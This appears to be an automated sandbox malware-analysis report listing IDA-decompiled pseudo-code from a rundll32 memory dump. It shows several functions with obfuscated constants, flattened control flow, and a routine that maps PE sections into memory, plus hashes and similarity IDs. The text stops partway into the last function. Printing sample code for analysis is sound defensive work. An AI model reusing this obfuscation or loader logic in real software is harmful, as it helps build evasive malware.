                                                                                                                                    C-Code - Quality: 90%
                                                                                                                                    			E002DDEDC(signed int* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, intOrPtr _a16) {
                                                                                                                                    				char _v44;
                                                                                                                                    				signed int _v48;
                                                                                                                                    				signed int _v52;
                                                                                                                                    				signed int _v56;
                                                                                                                                    				signed int _v60;
                                                                                                                                    				signed int _v64;
                                                                                                                                    				signed int _v68;
                                                                                                                                    				signed int _v72;
                                                                                                                                    				signed int _v76;
                                                                                                                                    				signed int _v80;
                                                                                                                                    				signed int _v84;
                                                                                                                                    				signed int _v88;
                                                                                                                                    				signed int _v92;
                                                                                                                                    				signed int _v96;
                                                                                                                                    				signed int _v100;
                                                                                                                                    				signed int _v104;
                                                                                                                                    				void* _t132;
                                                                                                                                    				signed int _t152;
                                                                                                                                    				signed int _t154;
                                                                                                                                    				signed int _t155;
                                                                                                                                    				void* _t158;
                                                                                                                                    				signed int* _t175;
                                                                                                                                    				void* _t177;
                                                                                                                                    				void* _t178;
                                                                                                                                    
                                                                                                                                    				_push(_a16);
                                                                                                                                    				_t174 = _a12;
                                                                                                                                    				_t175 = __ecx;
                                                                                                                                    				_push(_a12);
                                                                                                                                    				_push(_a8);
                                                                                                                                    				_push(_a4);
                                                                                                                                    				_push(__edx);
                                                                                                                                    				_push(__ecx);
                                                                                                                                    				E002D20B9(_t132);
                                                                                                                                    				_v68 = 0x4bd93;
                                                                                                                                    				_t178 = _t177 + 0x18;
                                                                                                                                    				_v68 = _v68 << 0xc;
                                                                                                                                    				_v68 = _v68 ^ 0x4bd93000;
                                                                                                                                    				_t158 = 0xc7349d4;
                                                                                                                                    				_v72 = 0xdd086a;
                                                                                                                                    				_v72 = _v72 + 0xe602;
                                                                                                                                    				_v72 = _v72 ^ 0x00de9932;
                                                                                                                                    				_v80 = 0x3b4fac;
                                                                                                                                    				_v80 = _v80 | 0x3fbbffff;
                                                                                                                                    				_v80 = _v80 ^ 0x3fb1db7a;
                                                                                                                                    				_v84 = 0xeaa49b;
                                                                                                                                    				_v84 = _v84 | 0xeaf55708;
                                                                                                                                    				_v84 = _v84 ^ 0x8a8b7318;
                                                                                                                                    				_v84 = _v84 ^ 0x607b886d;
                                                                                                                                    				_v88 = 0x47a;
                                                                                                                                    				_v88 = _v88 << 0x10;
                                                                                                                                    				_v88 = _v88 << 7;
                                                                                                                                    				_v88 = _v88 ^ 0x3d0d9eb4;
                                                                                                                                    				_v92 = 0xf1af5e;
                                                                                                                                    				_v92 = _v92 >> 0xc;
                                                                                                                                    				_t154 = 0x35;
                                                                                                                                    				_v92 = _v92 * 0x55;
                                                                                                                                    				_v92 = _v92 ^ 0x000492d7;
                                                                                                                                    				_v104 = 0x9f0b47;
                                                                                                                                    				_v104 = _v104 + 0xffffc934;
                                                                                                                                    				_v104 = _v104 ^ 0x723421f7;
                                                                                                                                    				_v104 = _v104 | 0x7192d654;
                                                                                                                                    				_v104 = _v104 ^ 0x73b08a7e;
                                                                                                                                    				_v100 = 0x1207d9;
                                                                                                                                    				_v100 = _v100 + 0x7e1b;
                                                                                                                                    				_v100 = _v100 | 0x7b677906;
                                                                                                                                    				_v100 = _v100 * 0xf;
                                                                                                                                    				_v100 = _v100 ^ 0x3c0b4b50;
                                                                                                                                    				_v60 = 0x5b441e;
                                                                                                                                    				_v60 = _v60 ^ 0x5c22d9cd;
                                                                                                                                    				_v60 = _v60 ^ 0x5c7ef938;
                                                                                                                                    				_v64 = 0xefe367;
                                                                                                                                    				_v64 = _v64 + 0x4581;
                                                                                                                                    				_v64 = _v64 ^ 0x00f6697a;
                                                                                                                                    				_v76 = 0x71c375;
                                                                                                                                    				_t155 = 0x14;
                                                                                                                                    				_v76 = _v76 / _t154;
                                                                                                                                    				_v76 = _v76 + 0xaf56;
                                                                                                                                    				_v76 = _v76 ^ 0x000ba048;
                                                                                                                                    				_v48 = 0x1a9f92;
                                                                                                                                    				_v48 = _v48 + 0x9d50;
                                                                                                                                    				_v48 = _v48 ^ 0x001d37d0;
                                                                                                                                    				_v52 = 0xf5c688;
                                                                                                                                    				_v52 = _v52 + 0xffff5f34;
                                                                                                                                    				_v52 = _v52 ^ 0x00ffa10c;
                                                                                                                                    				_v56 = 0x3cec64;
                                                                                                                                    				_v56 = _v56 ^ 0x003949c0;
                                                                                                                                    				_v96 = 0x7057ec;
                                                                                                                                    				_v96 = _v96 * 0x35;
                                                                                                                                    				_v96 = _v96 | 0xca3e56e5;
                                                                                                                                    				_v96 = _v96 / _t155;
                                                                                                                                    				_v96 = _v96 ^ 0x0b2d80e0;
                                                                                                                                    				do {
                                                                                                                                    					while(_t158 != 0x254c3a7) {
                                                                                                                                    						if(_t158 == 0x324cad4) {
                                                                                                                                    							E002D0DAF(_v100,  &_v44, _v60,  *_t174, _v64, _v76);
                                                                                                                                    							_t178 = _t178 + 0x10;
                                                                                                                                    							_t158 = 0xd972b83;
                                                                                                                                    							continue;
                                                                                                                                    						} else {
                                                                                                                                    							if(_t158 == 0xc7349d4) {
                                                                                                                                    								_t158 = 0x254c3a7;
                                                                                                                                    								 *_t175 =  *_t175 & 0x00000000;
                                                                                                                                    								_t175[1] = _v68;
                                                                                                                                    								continue;
                                                                                                                                    							} else {
                                                                                                                                    								if(_t158 == 0xd972b83) {
                                                                                                                                    									E002E0E3A( &_v44, _v48, __eflags, _v52, _v56, _v96, _t174 + 4);
                                                                                                                                    								} else {
                                                                                                                                    									if(_t158 == 0xecd5bc1) {
                                                                                                                                    										_push(_t158);
                                                                                                                                    										_push(_t158);
                                                                                                                                    										_t152 = E002C7FF2(_t175[1]);
                                                                                                                                    										 *_t175 = _t152;
                                                                                                                                    										__eflags = _t152;
                                                                                                                                    										if(__eflags != 0) {
                                                                                                                                    											_t158 = 0xfbc7198;
                                                                                                                                    											continue;
                                                                                                                                    										}
                                                                                                                                    									} else {
                                                                                                                                    										if(_t158 != 0xfbc7198) {
                                                                                                                                    											goto L13;
                                                                                                                                    										} else {
                                                                                                                                    											E002C3DBC( &_v44, _t175, _v88, _v92, _v104);
                                                                                                                                    											_t178 = _t178 + 0xc;
                                                                                                                                    											_t158 = 0x324cad4;
                                                                                                                                    											continue;
                                                                                                                                    										}
                                                                                                                                    									}
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    						L16:
                                                                                                                                    						__eflags =  *_t175;
                                                                                                                                    						_t131 =  *_t175 != 0;
                                                                                                                                    						__eflags = _t131;
                                                                                                                                    						return 0 | _t131;
                                                                                                                                    					}
                                                                                                                                    					_t175[1] = E002DAC3A(_t174);
                                                                                                                                    					_t158 = 0xecd5bc1;
                                                                                                                                    					L13:
                                                                                                                                    					__eflags = _t158 - 0x72dd7bf;
                                                                                                                                    				} while (__eflags != 0);
                                                                                                                                    				goto L16;
                                                                                                                                    			}




























                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: d<$g$Wp
                                                                                                                                    • API String ID: 0-355099142
                                                                                                                                    • Opcode ID: 6b2c2b6d1b47deee33f6011a26382e9fad0b3e922fbca3b1d898976e6b354319
                                                                                                                                    • Instruction ID: 8bc03cd1631752adf3b8fd55e616d29b4ca4d2259f4c0ecc16590f44ecea306f
                                                                                                                                    • Opcode Fuzzy Hash: 6b2c2b6d1b47deee33f6011a26382e9fad0b3e922fbca3b1d898976e6b354319
                                                                                                                                    • Instruction Fuzzy Hash: A57133B11193419FC764DF61C48982FBBF1FBC9748F10891EF29A96220D3B68A59CF46
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 90%
                                                                                                                                    			E002DC3A0(intOrPtr* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a16) {
                                                                                                                                    				signed int _v4;
                                                                                                                                    				intOrPtr _v8;
                                                                                                                                    				intOrPtr _v12;
                                                                                                                                    				signed int _v16;
                                                                                                                                    				signed int _v20;
                                                                                                                                    				signed int _v24;
                                                                                                                                    				signed int _v28;
                                                                                                                                    				signed int _v32;
                                                                                                                                    				signed int _v36;
                                                                                                                                    				signed int _v40;
                                                                                                                                    				signed int _v44;
                                                                                                                                    				signed int _v48;
                                                                                                                                    				signed int _v52;
                                                                                                                                    				signed int _v56;
                                                                                                                                    				signed int _v60;
                                                                                                                                    				signed int _v64;
                                                                                                                                    				void* _t137;
                                                                                                                                    				void* _t149;
                                                                                                                                    				void* _t159;
                                                                                                                                    				void* _t161;
                                                                                                                                    				signed int _t163;
                                                                                                                                    				signed int _t164;
                                                                                                                                    				signed int _t165;
                                                                                                                                    				signed int _t166;
                                                                                                                                    				signed int _t167;
                                                                                                                                    				void* _t188;
                                                                                                                                    				void* _t193;
                                                                                                                                    				intOrPtr* _t195;
                                                                                                                                    				signed int* _t197;
                                                                                                                                    				signed int* _t198;
                                                                                                                                    				signed int* _t199;
                                                                                                                                    
                                                                                                                                    				_push(_a16);
                                                                                                                                    				_t195 = __ecx;
                                                                                                                                    				_push(0);
                                                                                                                                    				_push(_a8);
                                                                                                                                    				_push(_a4);
                                                                                                                                    				_push(__edx);
                                                                                                                                    				_push(__ecx);
                                                                                                                                    				E002D20B9(_t137);
                                                                                                                                    				_v4 = _v4 & 0x00000000;
                                                                                                                                    				_v12 = 0x8437e8;
                                                                                                                                    				_v8 = 0xdb9720;
                                                                                                                                    				_v60 = 0xf5e956;
                                                                                                                                    				_v60 = _v60 << 0xc;
                                                                                                                                    				_t163 = 0x6b;
                                                                                                                                    				_v60 = _v60 / _t163;
                                                                                                                                    				_v60 = _v60 | 0x488cc8ef;
                                                                                                                                    				_v60 = _v60 ^ 0x48eedbff;
                                                                                                                                    				_v44 = 0x82c5a5;
                                                                                                                                    				_v44 = _v44 | 0x04b6a6f1;
                                                                                                                                    				_t164 = 0x4a;
                                                                                                                                    				_v44 = _v44 * 0x6a;
                                                                                                                                    				_v44 = _v44 ^ 0xf3bc2b72;
                                                                                                                                    				_v40 = 0x882fad;
                                                                                                                                    				_v40 = _v40 ^ 0x709d76bd;
                                                                                                                                    				_v40 = _v40 + 0xffff52d2;
                                                                                                                                    				_v40 = _v40 ^ 0x7014aba2;
                                                                                                                                    				_v28 = 0x22e756;
                                                                                                                                    				_v28 = _v28 + 0x769a;
                                                                                                                                    				_v28 = _v28 ^ 0x002bcc4a;
                                                                                                                                    				_v64 = 0xc290d0;
                                                                                                                                    				_v64 = _v64 + 0xffff641a;
                                                                                                                                    				_v64 = _v64 << 0xd;
                                                                                                                                    				_v64 = _v64 ^ 0xbd78a131;
                                                                                                                                    				_v64 = _v64 ^ 0x83ed8c94;
                                                                                                                                    				_v32 = 0x78b1b0;
                                                                                                                                    				_v32 = _v32 << 0xe;
                                                                                                                                    				_v32 = _v32 ^ 0x2c621b2d;
                                                                                                                                    				_v36 = 0xa1b61f;
                                                                                                                                    				_v36 = _v36 + 0xb017;
                                                                                                                                    				_v36 = _v36 | 0xc1836c3e;
                                                                                                                                    				_v36 = _v36 ^ 0xc1a0ee75;
                                                                                                                                    				_v56 = 0x2861cb;
                                                                                                                                    				_v56 = _v56 / _t164;
                                                                                                                                    				_v56 = _v56 << 0xd;
                                                                                                                                    				_t165 = 0x1b;
                                                                                                                                    				_v56 = _v56 / _t165;
                                                                                                                                    				_v56 = _v56 ^ 0x00aa9f16;
                                                                                                                                    				_v24 = 0x4a8582;
                                                                                                                                    				_v24 = _v24 | 0x39704e96;
                                                                                                                                    				_v24 = _v24 ^ 0x397cf0ca;
                                                                                                                                    				_v52 = 0x9fdf3f;
                                                                                                                                    				_v52 = _v52 | 0x733ecb9c;
                                                                                                                                    				_v52 = _v52 >> 0x10;
                                                                                                                                    				_t166 = 0x2c;
                                                                                                                                    				_v52 = _v52 / _t166;
                                                                                                                                    				_v52 = _v52 ^ 0x0002453b;
                                                                                                                                    				_v20 = 0x70cd9;
                                                                                                                                    				_v20 = _v20 ^ 0x0384d77a;
                                                                                                                                    				_v20 = _v20 ^ 0x03811849;
                                                                                                                                    				_v16 = 0x6ca56e;
                                                                                                                                    				_v16 = _v16 * 0x1c;
                                                                                                                                    				_v16 = _v16 ^ 0x0be055d0;
                                                                                                                                    				_v48 = 0x383b50;
                                                                                                                                    				_v48 = _v48 + 0xe78c;
                                                                                                                                    				_v48 = _v48 + 0x7960;
                                                                                                                                    				_v48 = _v48 + 0xffff251b;
                                                                                                                                    				_v48 = _v48 ^ 0x003eca00;
                                                                                                                                    				_t167 = _v28;
                                                                                                                                    				_t149 = E002C474F(_t167, __ecx, _v64, _v32);
                                                                                                                                    				_t159 = _t149;
                                                                                                                                    				_t197 =  &(( &_v64)[8]);
                                                                                                                                    				if(_t159 != 0) {
                                                                                                                                    					_push(_t167);
                                                                                                                                    					_t188 = E002CA3A3( *((intOrPtr*)(_t159 + 0x50)), _v36, _v56, _v24, _v40, _v44 | _v60);
                                                                                                                                    					_t198 =  &(_t197[5]);
                                                                                                                                    					if(_t188 == 0) {
                                                                                                                                    						L6:
                                                                                                                                    						return _t188;
                                                                                                                                    					}
                                                                                                                                    					E002CED7E(_v52, _t188, _v20,  *__ecx,  *((intOrPtr*)(_t159 + 0x54)));
                                                                                                                                    					_t199 =  &(_t198[3]);
                                                                                                                                    					_t193 = ( *(_t159 + 0x14) & 0x0000ffff) + 0x18 + _t159;
                                                                                                                                    					_t161 = ( *(_t159 + 6) & 0x0000ffff) * 0x28 + _t193;
                                                                                                                                    					while(_t193 < _t161) {
                                                                                                                                    						_t157 =  <  ?  *((void*)(_t193 + 8)) :  *((intOrPtr*)(_t193 + 0x10));
                                                                                                                                    						E002CED7E(_v16,  *((intOrPtr*)(_t193 + 0xc)) + _t188, _v48,  *((intOrPtr*)(_t193 + 0x14)) +  *_t195,  <  ?  *((void*)(_t193 + 8)) :  *((intOrPtr*)(_t193 + 0x10)));
                                                                                                                                    						_t199 =  &(_t199[3]);
                                                                                                                                    						_t193 = _t193 + 0x28;
                                                                                                                                    					}
                                                                                                                                    					goto L6;
                                                                                                                                    				}
                                                                                                                                    				return _t149;
                                                                                                                                    			}



































                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: P;8$V"$`y
                                                                                                                                    • API String ID: 0-4109183828
                                                                                                                                    • Opcode ID: da3d3e966c2bfd9a43e683d3757623c06ebfc3864563e683fe95cfd531e9bb60
                                                                                                                                    • Instruction ID: fa778ef1d77e87268bf766320fc4f0bf3e1d1a8109cb3831a5b84604b96b9c5c
                                                                                                                                    • Opcode Fuzzy Hash: da3d3e966c2bfd9a43e683d3757623c06ebfc3864563e683fe95cfd531e9bb60
                                                                                                                                    • Instruction Fuzzy Hash: 326133B15183409FC354CF66C88991BBBF1FBC9718F108A1DF69A96260D7B2D919CF06
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                    			E002C1A56(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                    				char _v44;
                                                                                                                                    				signed int _v48;
                                                                                                                                    				signed int _v52;
                                                                                                                                    				signed int _v56;
                                                                                                                                    				signed int _v60;
                                                                                                                                    				signed int _v64;
                                                                                                                                    				signed int _v68;
                                                                                                                                    				signed int _v72;
                                                                                                                                    				signed int _v76;
                                                                                                                                    				signed int _v80;
                                                                                                                                    				void* _t86;
                                                                                                                                    				void* _t100;
                                                                                                                                    				void* _t101;
                                                                                                                                    				void* _t103;
                                                                                                                                    				void* _t115;
                                                                                                                                    				void* _t116;
                                                                                                                                    				signed int _t117;
                                                                                                                                    				void* _t119;
                                                                                                                                    				void* _t120;
                                                                                                                                    
                                                                                                                                    				_push(_a8);
                                                                                                                                    				_t115 = __edx;
                                                                                                                                    				_t101 = __ecx;
                                                                                                                                    				_push(_a4);
                                                                                                                                    				_push(__edx);
                                                                                                                                    				_push(__ecx);
                                                                                                                                    				E002D20B9(_t86);
                                                                                                                                    				_v72 = 0xccde8a;
                                                                                                                                    				_t120 = _t119 + 0x10;
                                                                                                                                    				_v72 = _v72 | 0xfb673ead;
                                                                                                                                    				_v72 = _v72 + 0xedb6;
                                                                                                                                    				_t116 = 0;
                                                                                                                                    				_v72 = _v72 + 0xffff76c0;
                                                                                                                                    				_t103 = 0x3303944;
                                                                                                                                    				_v72 = _v72 ^ 0xfbf43e98;
                                                                                                                                    				_v48 = 0xd56f6c;
                                                                                                                                    				_v48 = _v48 ^ 0x96c3cc23;
                                                                                                                                    				_v48 = _v48 ^ 0x96174539;
                                                                                                                                    				_v76 = 0xdcf6fd;
                                                                                                                                    				_v76 = _v76 + 0xffffee01;
                                                                                                                                    				_t117 = 0x65;
                                                                                                                                    				_v76 = _v76 * 0x23;
                                                                                                                                    				_v76 = _v76 + 0xffff4e11;
                                                                                                                                    				_v76 = _v76 ^ 0x1e3c7761;
                                                                                                                                    				_v80 = 0x144f78;
                                                                                                                                    				_v80 = _v80 * 0x39;
                                                                                                                                    				_v80 = _v80 ^ 0xe273dc44;
                                                                                                                                    				_v80 = _v80 >> 5;
                                                                                                                                    				_v80 = _v80 ^ 0x073b5be1;
                                                                                                                                    				_v52 = 0xb4a3bb;
                                                                                                                                    				_v52 = _v52 ^ 0x916b14c7;
                                                                                                                                    				_v52 = _v52 ^ 0x91dd676b;
                                                                                                                                    				_v68 = 0x8d73f0;
                                                                                                                                    				_v68 = _v68 >> 0xe;
                                                                                                                                    				_v68 = _v68 * 0x1c;
                                                                                                                                    				_v68 = _v68 ^ 0x0000c864;
                                                                                                                                    				_v56 = 0xe6cb06;
                                                                                                                                    				_v56 = _v56 >> 4;
                                                                                                                                    				_v56 = _v56 | 0x1af2f565;
                                                                                                                                    				_v56 = _v56 ^ 0x1af384df;
                                                                                                                                    				_v60 = 0x4f2325;
                                                                                                                                    				_t55 =  &_v60; // 0x4f2325
                                                                                                                                    				_v60 =  *_t55 * 0x78;
                                                                                                                                    				_t57 =  &_v60; // 0x4f2325
                                                                                                                                    				_v60 =  *_t57 / _t117;
                                                                                                                                    				_v60 = _v60 ^ 0x0059a097;
                                                                                                                                    				_v64 = 0xa290a2;
                                                                                                                                    				_v64 = _v64 >> 4;
                                                                                                                                    				_v64 = _v64 + 0x6f89;
                                                                                                                                    				_v64 = _v64 ^ 0x00044b6b;
                                                                                                                                    				while(_t103 != 0x3303944) {
                                                                                                                                    					if(_t103 == 0x5a97fa2) {
                                                                                                                                    						__eflags = E002DD97D( &_v44, _v56, __eflags, _v60, _t115 + 0x30, _v64);
                                                                                                                                    						_t116 =  !=  ? 1 : _t116;
                                                                                                                                    					} else {
                                                                                                                                    						if(_t103 == 0xa5a4144) {
                                                                                                                                    							E002C3DBC( &_v44, _t101, _v72, _v48, _v76);
                                                                                                                                    							_t120 = _t120 + 0xc;
                                                                                                                                    							_t103 = 0xf0cd209;
                                                                                                                                    							continue;
                                                                                                                                    						} else {
                                                                                                                                    							if(_t103 != 0xf0cd209) {
                                                                                                                                    								L9:
                                                                                                                                    								__eflags = _t103 - 0x1b06c67;
                                                                                                                                    								if(__eflags != 0) {
                                                                                                                                    									continue;
                                                                                                                                    								} else {
                                                                                                                                    								}
                                                                                                                                    							} else {
                                                                                                                                    								_t100 = E002C2A21(_v80, _v52,  &_v44, _t115 + 0x38, _v68);
                                                                                                                                    								_t120 = _t120 + 0xc;
                                                                                                                                    								if(_t100 != 0) {
                                                                                                                                    									_t103 = 0x5a97fa2;
                                                                                                                                    									continue;
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    					}
                                                                                                                                    					return _t116;
                                                                                                                                    				}
                                                                                                                                    				_t103 = 0xa5a4144;
                                                                                                                                    				goto L9;
                                                                                                                                    			}























                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: %#O$DAZ$DAZ
                                                                                                                                    • API String ID: 0-2081751441
                                                                                                                                    • Opcode ID: 735cac04c0b91fcafe53dd54d1087b531fb08a74cbfbbe1956c72258fa92def8
                                                                                                                                    • Instruction ID: ffa7949745c70c09134b709494667eee014e3fe203e6b1de4f4145909f4304d7
                                                                                                                                    • Opcode Fuzzy Hash: 735cac04c0b91fcafe53dd54d1087b531fb08a74cbfbbe1956c72258fa92def8
                                                                                                                                    • Instruction Fuzzy Hash: 865166715083029FC758CF25D98691FBBE1FBD8708F500A2EF586A2221D375CA298F87
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 96%
                                                                                                                                    			E002E0C14(void* __ecx) {
                                                                                                                                    				signed int _v4;
                                                                                                                                    				signed int _v8;
                                                                                                                                    				signed int _v12;
                                                                                                                                    				signed int _v16;
                                                                                                                                    				signed int _v20;
                                                                                                                                    				signed int _v24;
                                                                                                                                    				signed int _v28;
                                                                                                                                    				signed int _v32;
                                                                                                                                    				signed int _v36;
                                                                                                                                    				signed int _v40;
                                                                                                                                    				signed int _v44;
                                                                                                                                    				void* _t111;
                                                                                                                                    				void* _t115;
                                                                                                                                    				void* _t116;
                                                                                                                                    				signed int _t118;
                                                                                                                                    				void* _t124;
                                                                                                                                    				void* _t125;
                                                                                                                                    				signed int* _t127;
                                                                                                                                    
                                                                                                                                    				_t127 =  &_v44;
                                                                                                                                    				_t116 = __ecx;
                                                                                                                                    				_v24 = 0x2b1199;
                                                                                                                                    				_v24 = _v24 + 0x4ba2;
                                                                                                                                    				_v24 = _v24 << 0xa;
                                                                                                                                    				_v24 = _v24 ^ 0xad737bf1;
                                                                                                                                    				_v44 = 0xc9a4fe;
                                                                                                                                    				_v44 = _v44 << 0xe;
                                                                                                                                    				_v44 = _v44 | 0xe69540e1;
                                                                                                                                    				_v44 = _v44 + 0xffffff88;
                                                                                                                                    				_v44 = _v44 ^ 0xefbb2da7;
                                                                                                                                    				_v28 = 0xedc73;
                                                                                                                                    				_v28 = _v28 + 0xffff2701;
                                                                                                                                    				_v28 = _v28 + 0x8bbf;
                                                                                                                                    				_v28 = _v28 ^ 0x00055e2c;
                                                                                                                                    				_v16 = 0xf95115;
                                                                                                                                    				_v16 = _v16 | 0x79ce56df;
                                                                                                                                    				_v16 = _v16 + 0xffff5817;
                                                                                                                                    				_v16 = _v16 ^ 0x79f40a5c;
                                                                                                                                    				_v36 = 0x520750;
                                                                                                                                    				_v36 = _v36 << 7;
                                                                                                                                    				_v36 = _v36 ^ 0x4f263ebd;
                                                                                                                                    				_v36 = _v36 * 6;
                                                                                                                                    				_v36 = _v36 ^ 0x64ef8369;
                                                                                                                                    				_t124 = 0;
                                                                                                                                    				_v40 = 0xccfebc;
                                                                                                                                    				_t125 = 0x2aa38ff;
                                                                                                                                    				_v40 = _v40 + 0xbaf7;
                                                                                                                                    				_t118 = 0xd;
                                                                                                                                    				_v40 = _v40 * 0x5e;
                                                                                                                                    				_v40 = _v40 + 0x6a66;
                                                                                                                                    				_v40 = _v40 ^ 0x4b80704d;
                                                                                                                                    				_v20 = 0xba2b89;
                                                                                                                                    				_v20 = _v20 + 0xa093;
                                                                                                                                    				_v20 = _v20 / _t118;
                                                                                                                                    				_v20 = _v20 ^ 0x000a03fd;
                                                                                                                                    				_v32 = 0xb0f3b0;
                                                                                                                                    				_v32 = _v32 + 0x50dc;
                                                                                                                                    				_v32 = _v32 + 0xffff1629;
                                                                                                                                    				_v32 = _v32 * 0x4e;
                                                                                                                                    				_v32 = _v32 ^ 0x35b73aee;
                                                                                                                                    				_v4 = 0x432383;
                                                                                                                                    				_v4 = _v4 + 0xffff373f;
                                                                                                                                    				_v4 = _v4 | 0x7532efd9;
                                                                                                                                    				_v4 = _v4 ^ 0x75785e39;
                                                                                                                                    				_v8 = 0x709bec;
                                                                                                                                    				_v8 = _v8 + 0xffffb2bc;
                                                                                                                                    				_v8 = _v8 + 0xffff08e7;
                                                                                                                                    				_v8 = _v8 ^ 0x006dec69;
                                                                                                                                    				_v12 = 0xe79dac;
                                                                                                                                    				_v12 = _v12 * 0x78;
                                                                                                                                    				_v12 = _v12 + 0xb337;
                                                                                                                                    				_v12 = _v12 ^ 0x6c9daebe;
                                                                                                                                    				do {
                                                                                                                                    					while(_t125 != 0x2aa38ff) {
                                                                                                                                    						if(_t125 == 0x81ec960) {
                                                                                                                                    							_t124 = _t124 + E002DC2F8(_v32, _t116 + 0x38, _v4, _v8, _v12);
                                                                                                                                    						} else {
                                                                                                                                    							if(_t125 == 0xa7224d4) {
                                                                                                                                    								_t118 = _v16;
                                                                                                                                    								_t111 = E002DC2F8(_t118, _t116 + 0x14, _v36, _v40, _v20);
                                                                                                                                    								_t127 =  &(_t127[3]);
                                                                                                                                    								_t125 = 0x81ec960;
                                                                                                                                    								_t124 = _t124 + _t111;
                                                                                                                                    								continue;
                                                                                                                                    							} else {
                                                                                                                                    								if(_t125 != 0xcb4deb0) {
                                                                                                                                    									goto L8;
                                                                                                                                    								} else {
                                                                                                                                    									_push(_t118);
                                                                                                                                    									_push(_t118);
                                                                                                                                    									_t115 = E002C474B();
                                                                                                                                    									_t127 =  &(_t127[2]);
                                                                                                                                    									_t125 = 0xa7224d4;
                                                                                                                                    									_t124 = _t124 + _t115;
                                                                                                                                    									continue;
                                                                                                                                    								}
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    						L11:
                                                                                                                                    						return _t124;
                                                                                                                                    					}
                                                                                                                                    					_t125 = 0xcb4deb0;
                                                                                                                                    					L8:
                                                                                                                                    				} while (_t125 != 0x4501b46);
                                                                                                                                    				goto L11;
                                                                                                                                    			}






















                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 9^xu$fj$im
                                                                                                                                    • API String ID: 0-3261451082
                                                                                                                                    • Opcode ID: 18b3828217514bbcca6388c8ecba237d954a44b53edf24ff878c84fc7e148a74
                                                                                                                                    • Instruction ID: 106b86b295c5c8065fe74f7e42360a188c44fbd3eabdcfff41b14b20cf9f3653
                                                                                                                                    • Opcode Fuzzy Hash: 18b3828217514bbcca6388c8ecba237d954a44b53edf24ff878c84fc7e148a74
                                                                                                                                    • Instruction Fuzzy Hash: ED5149B24183429BC784CF26D88540BBBE0FFD4368F541A1DF49566260D3B5CA59CF97
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 90%
                                                                                                                                    			E002D6C49(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                                                                    				signed int _v8;
                                                                                                                                    				signed int _v12;
                                                                                                                                    				signed int _v16;
                                                                                                                                    				signed int _v20;
                                                                                                                                    				signed int _v24;
                                                                                                                                    				signed int _v28;
                                                                                                                                    				signed int _v32;
                                                                                                                                    				signed int _v36;
                                                                                                                                    				signed int _v40;
                                                                                                                                    				signed int _v44;
                                                                                                                                    				signed int _v48;
                                                                                                                                    				signed int _v52;
                                                                                                                                    				intOrPtr _v56;
                                                                                                                                    				char _v88;
                                                                                                                                    				char _v608;
                                                                                                                                    				void* _t92;
                                                                                                                                    				void* _t96;
                                                                                                                                    				void* _t101;
                                                                                                                                    				void* _t112;
                                                                                                                                    				void* _t113;
                                                                                                                                    
                                                                                                                                    				_push(_a12);
                                                                                                                                    				_push(_a8);
                                                                                                                                    				_push(_a4);
                                                                                                                                    				_push(__edx);
                                                                                                                                    				_push(__ecx);
